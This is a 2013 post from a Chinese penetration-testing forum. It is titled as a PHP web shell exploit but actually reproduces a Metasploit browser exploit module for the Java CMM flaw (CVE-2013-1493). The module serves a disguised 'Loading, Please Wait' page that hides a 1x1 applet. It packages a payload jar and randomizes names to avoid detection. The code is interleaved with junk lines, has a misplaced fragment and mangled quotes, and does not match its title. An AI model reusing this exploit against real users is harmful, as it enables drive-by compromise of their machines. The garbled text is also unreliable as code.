中国网络渗透测试联盟
标题:
STUNSHELL PHP Web Shell远程执行代码
[打印本页]
作者:
admin
时间:
2013-4-4 17:31
标题:
STUNSHELL PHP Web Shell远程执行代码
##
5 }3 _! G/ c( Y; P: Z3 ^
; ]( k4 u/ J: T" f
# This file is part of the Metasploit Framework and may be subject to
& W" s6 W6 J) Y8 v4 w- J
# redistribution and commercial restrictions. Please see the Metasploit
% m# }' | x" o. A4 H; S7 Z m
# web site for more information on licensing and terms of use.
, a. {, B, F4 v" P! h
#
http://metasploit.com/
% n; e, y1 T8 U, d
##
1 Q( K4 e1 n: V
require ‘msf/core’
. G$ g0 ?) @' U0 v9 ~0 x1 G7 z- M
require ‘rex’
+ S" l; x2 v1 ~) ~0 V% J
class Metasploit3 < Msf::Exploit::Remote
3 [. `, W) w+ J0 g% |3 C/ s l( B# p
Rank = NormalRanking
0 x/ _3 ^4 j Z. n9 | ?
include Msf::Exploit::Remote::HttpServer::HTML
' B' Z$ L8 v* ]4 `! `/ q
include Msf::Exploit::EXE
8 J+ A6 }. d2 {, h" P( l
include Msf::Exploit::Remote::BrowserAutopwn
. {$ W- Q+ l9 a# {; O
autopwn_info({ :javascript => false })
1 N* d2 w6 f* r7 q9 C* Q
def initialize( info = {} )
4 A; Z) C! [6 p3 c4 i V* \, e# u' m! Y
super( update_info( info,
/ u, R8 `. j2 s4 o
‘Name’ => ‘Java CMM Remote Code Execution’,
5 J" k) S' |" D; ?3 z" R
‘Description’ => %q{
8 }3 x* F* S6 E$ d* U
This module abuses the Color Management classes from a Java Applet to run
/ e H/ Y4 k. v' k3 n9 T1 p) V
arbitrary Java code outside of the sandbox as exploited in the wild in February
; U% b/ h, S; `1 {8 E
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
- A |" D: d: \8 [
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
8 \# y, q7 n7 _3 Z
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
! I! A5 Y2 k$ B
warning in order to run the malicious applet.
% @8 T {% H# X' a" X- f' p9 c
},
( s- _" d* k) y1 I$ R
‘License’ => MSF_LICENSE,
! \9 [5 G5 w9 Z
‘Author’ =>
$ w( P/ x) S( e" c4 N' @& Z" c; |4 k
'Unknown', # Vulnerability discovery and Exploit
5 V9 H. w2 n0 `$ Z9 w
'juan vazquez' # Metasploit module (just ported the published exploit)
) n0 z; A* K" b% ^5 v5 y P/ k+ K
],
/ t! L2 Z- ~2 R5 Q; n' |: M: I
‘References’ =>
8 e0 X# M5 J/ E& F# t7 ~
[
9 m5 r" S$ E0 [& C
[ 'CVE', '2013-1493' ],
& w2 r* J: p& D4 s* K" D* Z
[ 'OSVDB', '90737' ],
1 t/ Y. }- @7 ~6 s4 s) l
[ 'BID', '58238' ],
+ ]5 `) E* c8 {0 W" m3 Z, G
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
' t7 F$ F/ U" k) Y. w/ _
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
, u" b2 p |. _. O& V
[ 'URL', 'http://pastie.org/pastes/6581034' ]
2 ]+ n4 e: D0 E
],
' A s) C, g- {2 m
‘Platform’ => [ 'win', 'java' ],
! y: N: D+ Q3 f# `/ ]$ C( A7 W
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
& A9 Y& A4 R' {! _/ F0 T( {
‘Targets’ =>
; k# F8 Z0 W: ~$ H @ N
[
# O5 y! o' k# e3 M; g
[ 'Generic (Java Payload)',
, J- q% F+ z' Y; X" R4 m
{
1 Y) g& R; a: y9 G: L( J/ |1 o
'Platform' => 'java',
( U! O9 H1 U T* P9 _" D- b
'Arch' => ARCH_JAVA
9 U$ U% |- l# u. }2 ?; V
}
4 a. k* p0 O( [8 x8 ^" i, N* T n3 t E
],
. e: _' V* D, v' F n
[ 'Windows x86 (Native Payload)',
$ A& o4 s. {3 W+ z
{
4 W7 A! {9 G' ]
'Platform' => 'win',
& ?7 z$ \# Z3 T
'Arch' => ARCH_X86
( A/ R3 [1 n/ U |- Z/ E- `9 O7 G
}
- w' H) |# O0 Q% Q r/ R0 z
]
9 G5 @- m" ~- f+ [8 Y" m- j3 O: M
],
# N4 a3 Y6 s2 `0 e
‘‘DisclosureDate’ => ‘Mar 01 2013′
# r9 A9 A9 l* S& ^ B" s
))
( F! D4 E( Y. H
end
/ K6 p/ C1 c! e3 E! A2 @
def setup
! n, m' G& B% e5 F, H( O
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
6 I! w6 x# k @5 n
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
( f+ t+ q- l* t( ~1 y" `
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
i# h2 r, Q0 ]/ N* q! L* ^
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
2 c( C$ f, w* A
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
7 X. X% H+ |" A9 O
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
% y9 o& d5 q" s8 e% O" \) ^
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
9 Z% G j* A% c7 y, t
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
$ [# [5 e# S9 f; Z: G5 l! Z+ I
@init_class_name = rand_text_alpha(“Init”.length)
: t2 q Z- x" R# X
@init_class.gsub!(“Init”, @init_class_name)
" y" J% j+ x0 v% n; E ?, Y
super
* k9 z# y- X! u" D/ g
end
. O4 Z( w2 {: X6 r6 q: R7 C
def on_request_uri(cli, request)
- i7 p) c, Y, F- k' @4 m2 s4 V
print_status(“handling request for #{request.uri}”)
: Z; M {( g% F( W5 M
case request.uri
2 `3 m0 S2 q: y% n5 \) ^$ x, X
when /\.jar$/i
0 Y. w6 j8 Z, i* l' D
jar = payload.encoded_jar
8 V0 b0 C% [( C
jar.add_file(“#{@init_class_name}.class”, @init_class)
5 Z; B2 \* W; |$ c! I, c( g
jar.add_file(“Leak.class”, @leak_class)
9 ?$ n4 l6 W* o; p
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
& w9 H6 A) y J. y2 ^& ^
jar.add_file(“MyColorSpace.class”, @color_space_class)
# V8 s+ }& o+ R, \
DefaultTarget’ => 1,
# b! O% z6 p$ x7 A M9 g
metasploit_str = rand_text_alpha(“metasploit”.length)
4 I3 N4 V5 Y- V. a8 T: r
payload_str = rand_text_alpha(“payload”.length)
: j0 Y2 Z% f+ s% x* h9 Q2 |2 I5 T
jar.entries.each { |entry|
/ I- E7 B4 f2 r! k- Z
entry.name.gsub!(“metasploit”, metasploit_str)
$ T3 y1 B6 O; N! L" B F, M- I
entry.name.gsub!(“Payload”, payload_str)
5 H0 W3 R1 @7 D: O1 S8 ?+ ^9 l E* F
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
6 B m6 @' S& U8 q2 z) Y! y1 O
entry.data = entry.data.gsub(“Payload”, payload_str)
# B& N ~8 G# K f. K- f
}
: r0 {% K! X/ x; ]0 G* d# K
jar.build_manifest
* X$ e/ l' e1 D$ `3 U+ j
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
% b3 S2 I& T- y' H+ T6 U$ f; w2 |
when /\/$/
+ M6 X) X0 V' Q, G5 O& v
payload = regenerate_payload(cli)
4 o5 S- n& U8 ?! k* H# Q* P
if not payload
" d2 ?1 y1 l3 I5 @3 W" Y6 q- H
print_error(“Failed to generate the payload.”)
* P) W$ N" ]4 V$ A/ X H$ Y
send_not_found(cli)
: H5 B2 O& V, \
return
* D! _$ Z0 y! ^! O* B
end
4 e3 l1 X5 X. w7 [& m. f6 L
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
: r+ i. R* f# Y: _+ Z2 B% b
else
7 V3 i7 g1 k M* ^/ g3 _/ ~
send_redirect(cli, get_resource() + ‘/’, ”)
6 M3 I0 K, C9 P7 E" `4 \3 [
end
u% D5 D) b1 ?2 u j" t) J) o
end
8 m: V! R1 x; \2 y2 w+ |+ m
def generate_html
' M/ E9 u% q1 ?, I8 E9 Q) d) b
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
; p. Y0 A/ x3 { O0 Y8 s
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
8 g1 ]$ C' S Z, ~6 g
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
' N# l. d2 j9 D) X" e2 a( w
html += %Q|</applet></body></html>|
. l* c: X. d& R, ^" [4 A
return html
- l8 _! U2 \# Z, G3 j1 n$ W' w' B
end
9 `5 x/ L" n8 _$ h5 X, E
end
) K9 F5 G& a% p- p* u
end
! o8 [/ n6 }- G) u
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2